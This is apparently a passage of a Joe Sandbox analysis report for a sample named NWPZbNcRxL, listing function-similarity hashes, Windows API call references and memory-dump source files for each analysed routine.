                                                                                                                            • Opcode ID: fc8430dbc67d8266770f8eae74d5214e67f2274b4a9ddcc7db01d575f69c3909
                                                                                                                            • Instruction ID: b8f3013293b3aaeb1246c70201d22d1145f2541510dbd82bc9cf200fc1ae5ba5
                                                                                                                            • Opcode Fuzzy Hash: fc8430dbc67d8266770f8eae74d5214e67f2274b4a9ddcc7db01d575f69c3909
                                                                                                                            • Instruction Fuzzy Hash: 93A188352047019FDB10EF14C495B6AB7E4FF8A318F448418F99A9B7A1CB30ED45EB86
                                                                                                                            APIs
                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C676EA
                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C67702
                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00C9FB80,000000FF,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C67727
                                                                                                                            • _memcmp.LIBCMT ref: 00C67748
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 314563124-0
                                                                                                                            • Opcode ID: 60fbbbaa6dee016da55329436ed1765cf79f5e66675aab5a02625d7af7f1cfc7
                                                                                                                            • Instruction ID: 4aea4ead734690646281b9cdae57dc4a9139467dd7c137a156d95d32762a34c1
                                                                                                                            • Opcode Fuzzy Hash: 60fbbbaa6dee016da55329436ed1765cf79f5e66675aab5a02625d7af7f1cfc7
                                                                                                                            • Instruction Fuzzy Hash: 00811C71A00109EFCB14DFA4C988EEEB7B9FF89315F204558F515AB250DB71AE46CB60
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2808897238-0
                                                                                                                            • Opcode ID: 2936fc656e45bbe5c22db72b94d493a2f44812a5ddb1a160c09a8f23c0c64511
                                                                                                                            • Instruction ID: b3224e21028ee8ba77e1cdc44f50078453aad1ebd87fddc4eefbb56d9f11db1d
                                                                                                                            • Opcode Fuzzy Hash: 2936fc656e45bbe5c22db72b94d493a2f44812a5ddb1a160c09a8f23c0c64511
                                                                                                                            • Instruction Fuzzy Hash: 695193747143019ADB34AFA6D8E5B6EB3E5AF45310F20D81FE596DB292DB70E880A701
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(00EFED00,?), ref: 00C99863
                                                                                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00C99896
                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C99903
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3880355969-0
                                                                                                                            • Opcode ID: 1b23c434ed14b5254d7318180a9eb93f84924ba0e384302daea86c1f8582ce13
                                                                                                                            • Instruction ID: b8a3c25fe0f1ac73aea60d7b274f99ddc7fb95796a78e762a388340735a0d222
                                                                                                                            • Opcode Fuzzy Hash: 1b23c434ed14b5254d7318180a9eb93f84924ba0e384302daea86c1f8582ce13
                                                                                                                            • Instruction Fuzzy Hash: 25514F34A00209EFDF10CF58D988AAE7BB5FF45360F15815DF8659B2A0D730AE41DB90
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C69AD2
                                                                                                                            • __itow.LIBCMT ref: 00C69B03
                                                                                                                              • Part of subcall function 00C69D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C69DBE
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C69B6C
                                                                                                                            • __itow.LIBCMT ref: 00C69BC3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$__itow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3379773720-0
                                                                                                                            • Opcode ID: c5ed96c898579197b18e99034f6921530707d5909165d07b102f4607cfbe50de
                                                                                                                            • Instruction ID: 76ff5c57393c1e5e27b87636fc9fe88015bc62784b509776d30a5331d2439811
                                                                                                                            • Opcode Fuzzy Hash: c5ed96c898579197b18e99034f6921530707d5909165d07b102f4607cfbe50de
                                                                                                                            • Instruction Fuzzy Hash: CE415574A00208ABDF31EF54D885FFE7BB9EF89750F000069F915A7291DB709A85EB91
                                                                                                                            APIs
                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00C869D1
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00C869E1
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C86A45
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00C86A51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2214342067-0
                                                                                                                            • Opcode ID: aa88eb8c4af8255104c822653757f6ef8c589614d53673f12dd84a9033e52dc8
                                                                                                                            • Instruction ID: d6d38e175914b2be66c3fad2cd894cc2d6e20f2be170790b145e2d6e46b9b543
                                                                                                                            • Opcode Fuzzy Hash: aa88eb8c4af8255104c822653757f6ef8c589614d53673f12dd84a9033e52dc8
                                                                                                                            • Instruction Fuzzy Hash: B7419F75640200AFEB60BF24DC96FBA77A8DF06B14F04C018FA19AB2C2DB709D41A795
                                                                                                                            APIs
                                                                                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C9F910), ref: 00C864A7
                                                                                                                            • _strlen.LIBCMT ref: 00C864D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4218353326-0
                                                                                                                            • Opcode ID: 7efa3b1161ef0956c6d57f29ced6387c4f028ecde320d186f23fda75d157bfc0
                                                                                                                            • Instruction ID: 8aa73d235dca287e2ff611a4fc7df326b615393b4d4d31755fdb02fa60a1b87a
                                                                                                                            • Opcode Fuzzy Hash: 7efa3b1161ef0956c6d57f29ced6387c4f028ecde320d186f23fda75d157bfc0
                                                                                                                            • Instruction Fuzzy Hash: 1341F331A00104ABCB14FBA8DCD9FEEB7A8EF45314F148159F8199B292DB30EE41EB54
                                                                                                                            APIs
                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C7B89E
                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C7B8C4
                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C7B8E9
                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C7B915
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3321077145-0
                                                                                                                            • Opcode ID: 6f53f0666a1b873701c9ec269e6cdf8f4c2d35bacfe9d282259a1e87eb02d156
                                                                                                                            • Instruction ID: c7c53b9debddb7469efd2ac88e815767729a29f090cd9d0e512fa77848a6e1fd
                                                                                                                            • Opcode Fuzzy Hash: 6f53f0666a1b873701c9ec269e6cdf8f4c2d35bacfe9d282259a1e87eb02d156
                                                                                                                            • Instruction Fuzzy Hash: DA410735600510DFDB10EF15C494A9DBBE1EF4A310F19C099ED5A9B3A2CB30EE42EB91
                                                                                                                            APIs
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C988DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InvalidateRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 634782764-0
                                                                                                                            • Opcode ID: e0b6e59016acc81966cc0d287cec476505ecd4034ab087ae6bd56516637fd07f
                                                                                                                            • Instruction ID: 2a787c95a7abe090ba5abf214f38a466d610353dd47894a1d3dd0bbfcd1743d1
                                                                                                                            • Opcode Fuzzy Hash: e0b6e59016acc81966cc0d287cec476505ecd4034ab087ae6bd56516637fd07f
                                                                                                                            • Instruction Fuzzy Hash: 83319034600108AEEF209E58CC8DFBD77A5EB07310F954116FA25E72E1CA71EA489766
                                                                                                                            APIs
                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00C9AB60
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C9ABD6
                                                                                                                            • PtInRect.USER32(?,?,00C9C014), ref: 00C9ABE6
                                                                                                                            • MessageBeep.USER32(00000000), ref: 00C9AC57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1352109105-0
                                                                                                                            • Opcode ID: e25bdb9d74973e262b2eacdbb1763a17fac4c2106330150fdb63cccb49ae42c3
                                                                                                                            • Instruction ID: 0019fcc188ce50341bb8898513224ce69c1eaf3105a5116d57f898b1ec80c949
                                                                                                                            • Opcode Fuzzy Hash: e25bdb9d74973e262b2eacdbb1763a17fac4c2106330150fdb63cccb49ae42c3
                                                                                                                            • Instruction Fuzzy Hash: D04138306002599FCF11DF58D888BAD7BF5FB49310F1881AAE825DF265D732E941DB92
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C461FB
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00C46229
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C46257
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C4628D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 66fd57db5f47d33d8bff6e82a795e25cba93feb922b4ca9e3fdc6399f2658a1e
                                                                                                                            • Instruction ID: d4d91f098c946f2cb0b31d7f01fca7d9e674b33a2acad11d1122e4710e12ebf7
                                                                                                                            • Opcode Fuzzy Hash: 66fd57db5f47d33d8bff6e82a795e25cba93feb922b4ca9e3fdc6399f2658a1e
                                                                                                                            • Instruction Fuzzy Hash: DE31DE30600286BFDF318F65CC48BAE7BA9FF42310F154029E864971A5E770EA50DB92
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32 ref: 00C94F02
                                                                                                                              • Part of subcall function 00C73641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7365B
                                                                                                                              • Part of subcall function 00C73641: GetCurrentThreadId.KERNEL32 ref: 00C73662
                                                                                                                              • Part of subcall function 00C73641: AttachThreadInput.USER32(00000000,?,00C75005), ref: 00C73669
                                                                                                                            • GetCaretPos.USER32(?), ref: 00C94F13
                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00C94F4E
                                                                                                                            • GetForegroundWindow.USER32 ref: 00C94F54
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2759813231-0
                                                                                                                            • Opcode ID: 9e98bd873ed2b3ca0956276fb7c3d801db1460c764d3c992e88663ec22fe4a72
                                                                                                                            • Instruction ID: eb7b21a852ae0c26e284aaffc851f1007bae0e7ed6be3e24351ab3d786cd753e
                                                                                                                            • Opcode Fuzzy Hash: 9e98bd873ed2b3ca0956276fb7c3d801db1460c764d3c992e88663ec22fe4a72
                                                                                                                            • Instruction Fuzzy Hash: ED311C71D00108AFDB10EFA5C885EEFB7FDEF99300F10406AE415E7241EA71AE459BA0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                                                                            • GetCursorPos.USER32(?), ref: 00C9C4D2
                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C4B9AB,?,?,?,?,?), ref: 00C9C4E7
                                                                                                                            • GetCursorPos.USER32(?), ref: 00C9C534
                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C4B9AB,?,?,?), ref: 00C9C56E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2864067406-0
                                                                                                                            • Opcode ID: cc426e04314cfd1ea921f32259a5a9e645529f67962282e00df63a6ccba98c02
                                                                                                                            • Instruction ID: c12037d22d156108eabff7e821ff74dbb52e163f1d6ef075be98b5222c9758d8
                                                                                                                            • Opcode Fuzzy Hash: cc426e04314cfd1ea921f32259a5a9e645529f67962282e00df63a6ccba98c02
                                                                                                                            • Instruction Fuzzy Hash: AA318F35600058AFCF158F98C89CEEE7BB5EB09310F45406AF9158B2A1C731AE61EBA4
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C68121
                                                                                                                              • Part of subcall function 00C6810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C6812B
                                                                                                                              • Part of subcall function 00C6810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C6813A
                                                                                                                              • Part of subcall function 00C6810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68141
                                                                                                                              • Part of subcall function 00C6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68157
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C686A3
                                                                                                                            • _memcmp.LIBCMT ref: 00C686C6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C686FC
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C68703
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1592001646-0
                                                                                                                            • Opcode ID: e5d1ced28259b598a8650d01a623703f5a3705a10af07d76e593aed2cbd5640b
                                                                                                                            • Instruction ID: fa569948783ea9de40e4f90032c12aae1255601535e53b35f187ede641f03d3b
                                                                                                                            • Opcode Fuzzy Hash: e5d1ced28259b598a8650d01a623703f5a3705a10af07d76e593aed2cbd5640b
                                                                                                                            • Instruction Fuzzy Hash: 9421AF71E10109EFDB20DFA4C989BEEB7B9EF44304F158159E854AB240DB71EE09DB90
                                                                                                                            APIs
                                                                                                                            • __setmode.LIBCMT ref: 00C309AE
                                                                                                                              • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
                                                                                                                              • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50
                                                                                                                            • _fprintf.LIBCMT ref: 00C309E5
                                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 00C65DBB
                                                                                                                              • Part of subcall function 00C34AAA: _flsall.LIBCMT ref: 00C34AC3
                                                                                                                            • __setmode.LIBCMT ref: 00C30A1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
